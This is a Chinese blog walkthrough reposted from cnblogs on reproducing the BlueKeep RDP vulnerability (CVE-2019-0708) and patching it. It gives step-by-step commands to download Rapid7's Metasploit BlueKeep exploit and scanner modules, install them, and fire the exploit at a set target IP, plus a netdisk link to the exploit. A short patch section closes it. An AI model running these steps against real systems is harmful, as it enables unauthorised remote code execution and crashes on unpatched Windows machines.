CVE 2019-0708漏洞复现防御修复

短命女 2023-08-17 17:03 115阅读 0赞

# **CVE-2019-0708** #

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞，便可以在目标系统上执行任意代码，包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是，这个漏洞的触发无需用户交互，攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒，从而进行大规模传播和破坏。

## **影响范围** ##

*  Windows 7
 *  Windows Server 2008 R2
 *  Windows Server 2008
 *  Windows 2003
 *  Windows XP

首先更新我们的kaili

apt-get  install metasploit-framework

更新完成后

打开msfconsole 并未有利用程序只有检测工具

![1222663-20190907140018354-1056418370.png][]

下载 exp

网盘：链接: https://pan.baidu.com/s/11He0JOhvKfWPaXCcclmKtQ 提取码: vh8h

##### wget 下载 #####

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

把下载的文件

依次执行命令创建利用文件夹

mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/
    mkdir  -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
    mkdir  -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
    cp rdp.rb   /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
    cp rdp_scanner.rb   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    
    cp cve_2019_0708_bluekeep.rb  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    
    cp cve_2019_0708_bluekeep_rce.rb   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

重新打开msfconsole

重新加载

reload_all

![1222663-20190907141035369-1405400687.png][]

我们导入

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

![1222663-20190907150104281-1396062110.png][]

这个exp 目前只有 windwos 7  /2008r2  而且是社区阉割版容易蓝屏

set RHOSTS 设置IP  
set RPORT 设置RDP端口号  
使用set target ID设置受害机机器  
使用exploit开始攻击,等待建立连接

![1222663-20190907150249357-1932975893.png][]

当然也可以选其他的

show targets

直接run

![1222663-20190907154421783-1326335609.png][]

之前复现过一次在复现就一执行就蓝屏 放一张朋友成功的

![1222663-20190907154919877-304114728.png][]

而我的

![1222663-20190907154947352-154364825.png][]

## **漏洞****修复** ##

[http://weishi.360.cn/mianyigongju.html][http_weishi.360.cn_mianyigongju.html]

前往这个地址进行漏洞修复

![1222663-20190907155303994-152053196.png][]

![1222663-20190907155318411-451143664.png][]

转载于:https://www.cnblogs.com/feizianquan/p/11481294.html

[1222663-20190907140018354-1056418370.png]: /images/20230808/afd31b172ffe4a73bc4a131d341c9046.png
[1222663-20190907141035369-1405400687.png]: /images/20230808/7129cf150641478496d8d507ed5e0ec6.png
[1222663-20190907150104281-1396062110.png]: /images/20230808/42bfef392217427a85dc2809a2600d1c.png
[1222663-20190907150249357-1932975893.png]: /images/20230808/06f0fabf18714a318e192ca6735ebfe9.png
[1222663-20190907154421783-1326335609.png]: /images/20230808/77e500f925b14aa88568ba317f304102.png
[1222663-20190907154919877-304114728.png]: /images/20230808/260e796990f34bd0a848f0b72f6fc11d.png
[1222663-20190907154947352-154364825.png]: /images/20230808/0436e44a215b4e56918f685246911d50.png
[http_weishi.360.cn_mianyigongju.html]: http://weishi.360.cn/mianyigongju.html
[1222663-20190907155303994-152053196.png]: /images/20230808/ad43da76df8e42439a09b94eeaf0d7f3.png
[1222663-20190907155318411-451143664.png]: /images/20230808/a5a8355146404c67b6666049886d55c6.png